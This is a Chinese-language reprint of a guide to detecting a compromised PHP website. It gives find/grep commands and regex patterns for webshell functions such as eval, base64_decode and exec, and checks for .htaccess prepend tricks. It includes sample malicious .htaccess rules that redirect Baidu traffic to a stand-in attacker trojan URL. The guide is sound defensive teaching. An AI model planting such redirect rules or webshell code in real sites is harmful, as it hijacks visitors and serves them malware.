from :http://www.gregfreeman.org/2013/how-to-tell-if-your-php-site-has-been-compromised/
0x01 查看訪問(wèn)日志
看是否有文件上傳操作(POST方法),
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">IPREMOVED - - [01/Mar/2013:06:16:48 -0600] "POST/uploads/monthly_10_2012/view.php HTTP/1.1" 200 36 "-" "Mozilla/5.0" IPREMOVED - - [01/Mar/2013:06:12:58 -0600] "POST/public/style_images/master/profile/blog.php HTTP/1.1" 200 36 "-" "Mozilla/5.0"</code>
nginx默認(rèn)記錄的日志格式為:
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">access_log logs/access.<span>log</span></code>
或
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">access_log logs/access.<span>log</span>combined;</code>
nginx默認(rèn)記錄日志的位置為:
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">nginx安裝目錄/<span>log</span>/</code>
0x02 查找含有惡意php代碼的文件
2.1 查找最近發(fā)生變化的php文件
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name '*.php' -mtime -7</code>
-type f 表示搜索正常的一般文件 -mtime -7 表示7*24小時(shí)內(nèi)修改的文件
結(jié)果可能如下:
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">.<span>/uploads/monthly</span>_04_2008/index.php .<span>/uploads/monthly</span>_10_2008/index.php .<span>/uploads/monthly</span>_08_2009/template.php .<span>/uploads/monthly</span>_02_2013/index.php</code>
2.2 查找文件中是否存在疑似代碼
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'*.php'</span>| xargs<span>grep</span>-l<span>"eval<span>*(</span>"</span>--color</code>
(*代表任意個(gè)空格)
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'*.php'</span>| xargs<span>grep</span>-l<span>"base64_decode<span>*(</span>"</span>--color find . -type f -name<span>'*.php'</span>| xargs<span>grep</span>-l<span>"gzinflate<span>*(</span>"</span>--color find . -type f -name<span>'*.php'</span>| xargs<span>grep</span>-l<span>"eval<span>*(</span>str_rot13<span>*(</span>base64_decode<span>*(</span>"</span>--color</code>
注解:很多命令不支持管道傳遞參數(shù),而實(shí)際上又需要這樣,所以就用了xargs命令,這個(gè)命令可以用來(lái)管道傳遞參數(shù);grep -l表示只包含某個(gè)字符串的文件名,如果去掉-l則會(huì)顯示匹配特定字符串的行內(nèi)容
幾個(gè)特殊字符串的意義: eval()把字符串按照php代碼來(lái)執(zhí)行,是最常見(jiàn)的php一句話木馬
base64_decode() 將字符串base64解碼,攻擊的時(shí)候payload是base64編碼,則這個(gè)函數(shù)就有用武之地了
gzinflate() 將字符串解壓縮處理,攻擊的時(shí)候payload用gzdeflate壓縮之后,使用這個(gè)函數(shù)進(jìn)行解壓縮
str_rot13() 對(duì)字符串進(jìn)行rot13編碼
也可以使用正則表達(dá)式來(lái)搜索文件,查找可以代碼:
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'*.php'</span>| xargs egrep -i<span>"(mail|fsockopen|pfsockopen|stream\_socket\_client|exec|system|passthru|eval|base64_decode)<span>*(</span>"</span></code>
下面解釋webshell常用的函數(shù):
mail():可用來(lái)向網(wǎng)站用戶(hù)發(fā)送垃圾郵件
fsockopen():打開(kāi)一個(gè)網(wǎng)絡(luò)連接或者一個(gè)unix套接字連接,可用于payload發(fā)送遠(yuǎn)程請(qǐng)求
pfsockopen():和fsockopen()作用類(lèi)似
stream_socket_client():建立一個(gè)遠(yuǎn)程連接,例子如下:
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;"><span><?php</span><span>$fp</span>= stream_socket_client(<span>"tcp://www.example.com:80"</span>,<span>$errno</span>,<span>$errstr</span>,<span>30</span>);<span>if</span>(!<span>$fp</span>) {<span></span><span>echo</span><span>"$errstr ($errno)<br />\n"</span>; }<span>else</span>{<span></span>fwrite(<span>$fp</span>,<span>"GET / HTTP/1.0\r\nHost: www.example.com\r\nAccept: */*\r\n\r\n"</span>);<span></span><span>while</span>(!feof(<span>$fp</span>)) {<span></span><span></span><span>echo</span>fgets(<span>$fp</span>,<span>1024</span>);<span></span>}<span></span>fclose(<span>$fp</span>); }<span>?></span></code>
exec():命令執(zhí)行函數(shù)
system():同exec()
passthru():同exec()
preg_replace()正則表達(dá)式由修飾符"e"修飾的時(shí)候,替換字符串在替換之前需要按照php代碼執(zhí)行,這種情況也需要考慮到,這種情況可采用這種以下掃搜:
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'*.php'</span>| xargs egrep -i<span>"preg_replace<span>*\</span>((['|\"])(.).<span>*\</span>2[a-z]<span>*e</span>[^\1]<span>*\</span>1<span>*,</span>"</span>--color</code>
0x03 比較代碼文件
這種情況需要有一份干凈的代碼,這份代碼和正在使用的代碼進(jìn)行比較,
檢測(cè)php網(wǎng)站是否已經(jīng)被攻破的方法WEB安全
,電腦資料
《檢測(cè)php網(wǎng)站是否已經(jīng)被攻破的方法WEB安全》(http://www.oriental01.com)。例如<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">diff -r wordpress-clean/ wordpress-compromised/ -x wp-content</code>
上面的例子是比較wordpress-clean/ 和wordpress-comprised/兩個(gè)目錄,并且目錄里面的wp-content/子目錄不比較
0x04 搜尋可寫(xiě)的目錄
看這個(gè)目錄里面是否有可疑文件,如下腳本查找權(quán)限為777的目錄是否存在php文件
search_dir=<span>$(</span>pwd)writable_dirs=<span>$(</span>find<span>$search_dir</span>-type d -perm<span>0777</span>)<span>for</span>dir<span>in</span><span>$writable_dirs</span><span>do</span><span>#echo $dir</span>find<span>$dir</span>-type f -name<span>'*.php'</span>done
經(jīng)常在jpg文件中插入php代碼,因此在查詢(xún)這些目錄的時(shí)候也要查詢(xún)jpg文件:
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find wp-content/uploads -type f -iname<span>'*.jpg'</span>| xargs<span>grep</span>-i php</code>
注意:-iname 表示文件名不區(qū)分大小寫(xiě) grep -i 也表示不區(qū)分大小寫(xiě)
0x05 檢測(cè)iframe標(biāo)簽
經(jīng)常做的是嵌入iframe標(biāo)簽,因此可以查看網(wǎng)頁(yè)的源代碼,并且搜索其中是否存在iframe標(biāo)簽,可使用如下命令:
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">grep -i '<span><<span>iframe'</span><span>mywebsite.txt</span></span></code>
對(duì)于動(dòng)態(tài)生成的頁(yè)面,可使用ff的 Live HTTP Headers 插件,下載到源碼之后再查找是否存在iframe標(biāo)簽
0x06 查找數(shù)據(jù)庫(kù)中是否存在敏感字符串
包括%base64_%、%eval(%<等上面提到的一些關(guān)鍵詞
0x07 檢查.htaccess文件
是否包含了auto_prepend_file和auto_append_file,使用如下命令
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'\.htaccess'</span>| xargs<span>grep</span>-i auto_prepend_file find . -type f -name<span>'\.htaccess'</span>| xargs<span>grep</span>-i auto_append_file</code>
auto_prepend_file的作用是加載當(dāng)前腳本文件之前,先加載的php腳本 auto_append_file的作用是加載當(dāng)前腳本文件之后,再加載的php腳本。 如果這么修改了.htaccess文件,那么可以在訪問(wèn).htaccess目錄的php腳本時(shí),加載上自己想要加載的惡意腳本 .
htaccess文件還可以被用來(lái)把訪問(wèn)網(wǎng)站的流量劫持到 的網(wǎng)站,
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;"><span>RewriteCond</span><span>%{HTTP_USER_AGENT}</span>^.*<span>Baiduspider</span>.*<span>$</span><span>Rewriterule</span>^(.*)<span>$</span><span>http:</span>/<span>/www.hacker.com/muma</span>.php [<span>R</span>=<span>301</span>]</code>
將baidu爬蟲(chóng)的訪問(wèn)重定向到 的網(wǎng)站(包含HTTP_USER_AGENT和http關(guān)鍵字)
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;"><span>RewriteCond</span><span>%{HTTP_REFERER}</span>^.*baidu.com.*<span>$</span><span>Rewriterule</span>^(.*)<span>$</span><span>http:</span>/<span>/www.hacker.com/muma</span>.php [<span>R</span>=<span>301</span>]</code>
將來(lái)自baidu搜索引擎的流量重定向到 的網(wǎng)站(包含HTTP_REFERER和http關(guān)鍵字) 為了查看網(wǎng)站是否被.htaccess修改導(dǎo)致流量劫持,可以在搜索.htaccess文件的時(shí)候采用如下命令:
<code style="padding: 0px; font-family: Monaco, Menlo, Consolas, 'Courier New', monospace; color: inherit; border-top-left-radius: 3px; border-top-right-radius: 3px; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; background-color: transparent; border: 0px;">find . -type f -name<span>'\.htaccess'</span>| xargs<span>grep</span>-i http; find . -type f -name<span>'\.htaccess'</span>| xargs<span>grep</span>-i HTTP_USER_AGENT; find . -type f -name<span>'\.htaccess'</span>| xargs<span>grep</span>-i HTTP_REFERER</code>